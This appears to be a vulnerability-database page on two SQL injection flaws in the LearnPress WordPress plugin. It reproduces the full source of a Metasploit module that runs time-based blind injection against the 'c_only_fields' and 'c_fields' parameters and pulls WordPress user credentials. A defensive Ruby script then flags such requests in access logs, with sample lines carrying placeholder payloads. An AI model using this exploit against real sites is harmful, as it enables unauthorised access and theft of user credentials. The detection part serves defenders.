| Title | Published | Reporter |
|---|---|---|
| WordPress LMS 4.2.7 SQL Injection Vulnerability | 23 Sep 2024 00:00 | zdt |
| Exploit for SQL Injection in Thimpress Learnpress | 19 Sep 2024 07:04 | githubexploit |
| Exploit for SQL Injection in Thimpress Learnpress | 12 Oct 2024 20:52 | githubexploit |
| The vulnerability of the "c_only_fields" parameter in the REST API endpoint /wp-json/learnpress/v1/courses of the LearnPress plugin for the WordPress content management system allows a hacker to execute arbitrary SQL code. | 18 Feb 2025 00:00 | bdu_fstec |
| CVE-2024-8522 | 12 Sep 2024 10:08 | circl |
| CVE-2024-8529 | 12 Sep 2024 11:51 | circl |
| WordPress plugin LearnPress SQL injection vulnerability | 12 Sep 2024 00:00 | cnnvd |
| WordPress plugin LearnPress SQL injection vulnerability | 12 Sep 2024 00:00 | cnnvd |
| CVE-2024-8522 | 12 Sep 2024 08:30 | cve |
| CVE-2024-8529 | 12 Sep 2024 08:30 | cve |

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529)',
        'Description' => %q{
          The LearnPress WordPress LMS Plugin up to version 4.2.7 is vulnerable to SQL injection via
          the 'c_only_fields' and 'c_fields' parameters. This allows unauthenticated attackers to exploit blind SQL injections
          and extract sensitive information.
        },
        'Author' => [
          'abrahack', # Vulnerability Discovery
          'Valentin Lobstein', # Metasploit Module
          'Achref Ben Thameur a.k.a achrefthameur' # Help for CVE-2024-8529 reproduction
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-8522'],
          ['EDB', '52171'],
          ['CVE', '2024-8529'],
          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-only-fields'],
          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-fields']
        ],
        'Actions' => [
          ['CVE-2024-8522', { 'Description' => 'SQL Injection via c_only_fields parameter' }],
          ['CVE-2024-8529', { 'Description' => 'SQL Injection via c_fields parameter' }]
        ],
        'DefaultAction' => 'CVE-2024-8522',
        'DefaultOptions' => { 'SqliDelay' => '2', 'VERBOSE' => true },
        'DisclosureDate' => '2024-09-11',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options [
      OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
    ]
  end

  def run_host(_ip)
    if action.name.downcase.include?('cve-2024-8529')
      sqli_param = 'c_fields'
      description = 'CVE-2024-8529'
      path = '/wp-json/lp/v1/courses/archive-course'
      additional_params = { 'return_type' => 'json' }
    else
      sqli_param = 'c_only_fields'
      description = 'CVE-2024-8522'
      path = '/learnpress/v1/courses'
      additional_params = {}
    end

    print_status("Performing SQL injection for #{description} via the '#{sqli_param}' parameter...")

    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
      random_negative_number = -Rex::Text.rand_text_numeric(2).to_i
      vars_get = { sqli_param => "IF(COUNT(*)!=#{random_negative_number},(#{payload}),0)" }.merge(additional_params)
      vars_get['rest_route'] = path if action.name.downcase.include?('cve-2024-8522')

      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, path),
        'vars_get' => vars_get
      })
      fail_with(Failure::Unreachable, 'Connection failed') unless res
    end

    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless @sqli.test_vulnerable
    print_good('Target is vulnerable to SQLi!')

    wordpress_sqli_initialize(@sqli)
    wordpress_sqli_get_users_credentials(datastore['COUNT'])
  end
end
```
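
The module's notes list `IOC_IN_LOGS` as a side effect: the injected expression travels in the `c_only_fields` or `c_fields` query parameter of a GET request. The following Ruby log check is an added example, not part of the module or of this page. It flags access-log lines that hit the two routes above with a field parameter that is not a plain field list. The combined log format, the rule that a legitimate value is a comma-separated list of column names, and the sample lines are all assumptions constructed for illustration.

```ruby
require 'uri'

# Routes and parameter names as they appear in the module above.
ROUTES = ['/learnpress/v1/courses', '/lp/v1/courses/archive-course'].freeze
PARAMS = %w[c_only_fields c_fields].freeze
# Assumption: a legitimate value is a comma-separated list of column names.
FIELD_LIST = /\A(?:\w+(?:\s*,\s*\w+)*)?\z/

# Returns [param, decoded_value] when a combined-log-format line requests a
# LearnPress course route with a field parameter that is not a plain field
# list; returns nil otherwise.
def suspicious_field_param(line)
  target = line[/"(?:GET|POST) (\S+) HTTP/, 1]
  return nil unless target

  path, query = target.split('?', 2)
  return nil unless query

  begin
    pairs = URI.decode_www_form(query)
  rescue ArgumentError
    # Broken percent-encoding on these routes is itself worth a look.
    return ROUTES.any? { |r| path.include?(r) } ? ['(malformed query)', query] : nil
  end

  rest_route = pairs.assoc('rest_route').to_a.last.to_s
  return nil unless ROUTES.any? { |r| path.include?(r) || rest_route.include?(r) }

  # .b: compare as bytes so undecodable input cannot break the regex match.
  pairs.find { |name, value| PARAMS.include?(name) && value.b !~ FIELD_LIST }
end

# One "client param=value" summary per flagged line.
def flagged_lines(log)
  log.each_line.filter_map do |line|
    hit = suspicious_field_param(line)
    "#{line[/\A\S+/]} #{hit[0]}=#{hit[1]}" if hit
  end
end

# Constructed sample lines: documentation addresses, EXPR is a placeholder.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [12/Sep/2024:10:00:01 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=post_title,ID HTTP/1.1" 200 512 "-" "curl/8.0"
  198.51.100.7 - - [12/Sep/2024:10:00:05 +0000] "GET /?rest_route=%2Flearnpress%2Fv1%2Fcourses&c_only_fields=IF(COUNT(*)!%3D-42%2C(EXPR)%2C0) HTTP/1.1" 200 498 "-" "-"
  203.0.113.9 - - [12/Sep/2024:10:01:10 +0000] "GET /wp-json/lp/v1/courses/archive-course?return_type=json&c_fields=IF(COUNT(*)!%3D-17%2C(EXPR)%2C0) HTTP/1.1" 200 733 "-" "-"
  203.0.113.9 - - [12/Sep/2024:10:02:00 +0000] "GET /shop?c_fields=a(b) HTTP/1.1" 200 100 "-" "-"
LOG

puts flagged_lines(SAMPLE_LOG) if $PROGRAM_NAME == __FILE__
```

Because the module uses time-based blind injection, a real run produces many such requests from one client in quick succession, so counting flagged lines per client address is a useful follow-up.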